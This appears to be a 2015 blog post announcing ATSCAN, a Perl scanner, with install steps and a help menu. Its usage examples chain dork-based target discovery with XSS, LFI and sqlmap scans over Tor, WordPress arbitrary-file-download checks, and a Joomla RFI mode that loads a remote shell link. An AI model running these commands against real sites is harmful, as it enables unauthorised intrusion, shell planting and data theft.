Tuesday, 29 December 2015

ATSCAN

Site / server scanner



Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
This is my first script; I'm sure it is full of mistakes!!
Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0,
Arch Linux, Fedora Linux, CentOS.
If you use Windows you can download it manually.
Download & Execution:
git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x ATSCAN
./ATSCAN
OR
chmod +x atscan.pl
Execute: perl ./atscan.pl
Execute: perl ./atscan.pl --help
HELP:
--tor         tor proxy [DEFAULT:socks://localhost:9050] Change if needed!
--dork        Search engine
--mp          set number of page results to scan
--xss         Xss scan
--lfi         lfi scan
-t            Target
-l            List name
--exp         Set exploit
--valid       Text to validate results
--sqlmap      Sqlmapping xss results
--sqlmaptor   Sqlmapping xss results using tor proxy
--lfi         local file inclusion
--joomrfi     get joomla sites with rfi in the server
--shell       shell link [Ex: http://www.site.com/shell.txt]
--wpadf       get wordpress sites with arbitrary file download in the server
--admin       get site admin page
--shost       get site subdomains
--ports       scan server ports
--start       start scan port
--end         end scan port
--tcp         tcp ports
--udp         udp ports
--all         complete mode
--basic       basic mode
--sites       sites in the server
--wp          wordpress sites in the server
--joom        joomla sites in the server
--upload      get sites with upload files in the server
--zip         get sites with zip files in the server
--st          string
--md5         convert to md5
--encode64    encode base64 string
--decode64    decode base64 string
--isup        check http status 200
--httpd       print site httpd version
EXAMPLES:
Simple search: 

-s DORK --mp [number of page results to scan]
-s [DORK1,DORK2,DORK3..] --mp [number of page results to scan]
-s [DORK.txt] --mp [number of page results to scan from list]

Subscan from Search Engine

Xss: --dork DORK --mp 1 --xss
Xss: --dork DORKS.TXT --mp 1 --xss
Lfi: --dork DORK --mp 1 --lfi
Search + Command: --dork DORK --mp VALUE --command 'curl -v' --TARGET

Validation

Xss: --dork DORK --mp 1 --xss --valid TEXT
Lfi: --dork DORK --mp 1 --lfi --valid TEXT
Xss: --dork DORK --mp 1 --xss --isup
Lfi: --dork DORK --mp 1 --lfi --isup
Xss: --dork DORKS.TXT --mp 1 --xss --valid TEXT
Lfi: --dork DORKS.TXT --mp 1 --lfi --valid TEXT
Xss: --dork DORKS.TXT --mp 1 --xss --isup
Lfi: --dork DORKS.TXT --mp 1 --lfi --isup

Use List / Target

Xss: -t TARGET --xss
Lfi: -l TARGET --lfi
Xss + Validation: -t TARGET --xss --valid TEXT
Lfi + Validation: -t TARGET --lfi --valid TEXT
Xss + Validation: -l list.txt --xss --isup
Lfi + Validation: -l list.txt --lfi --isup
Find admin page: -t TARGET --admin
Find subdomains: -t TARGET --shost

Server: 

Get Server sites: -t IP --mp [VALUE] --sites
Get Server sites: -t IP.txt --mp [VALUE] --sites
Get Server wordpress sites: -t IP --mp [VALUE] --wp
Get Server joomla sites: -t IP --mp [VALUE] --joom
Get Server upload sites: -t IP --mp [VALUE] --upload
Get Server zip sites files: -t IP --mp [VALUE] --zip
WP Arbitrary File Download: -t IP --mp [VALUE] --wpadf
Joomla RFI: -t IP --mp <1> --joomrfi --shell SHELL LINK
Scan basic tcp (quick): -t IP --ports --basic --tcp
Scan basic udp (quick): -t IP --ports --basic --udp
Scan basic udp+tcp: -t IP --ports --basic --udp --tcp
Scan complete tcp: -t IP --ports --all --tcp
Scan complete udp: -t IP --ports --all --udp
Scan complete tcp+udp: -t IP --ports --all --udp --tcp
Scan range tcp: -t IP --ports --start --end --tcp
Scan range udp: -t IP --ports --start --end --udp
Scan range udp + tcp: -t IP --ports --start VALUE --end VALUE --udp --tcp

Encode / Decode: 

Generate MD5: -st STRING --md5
Encode base64: -st STRING --encode64
Decode base64: -st STRING --decode64

ATSCAN 9.6 RELEASE IS OUT

SOME INSTRUCTIONS HAVE CHANGED!!
USE HELP MENU TO SEE CHANGES!!!
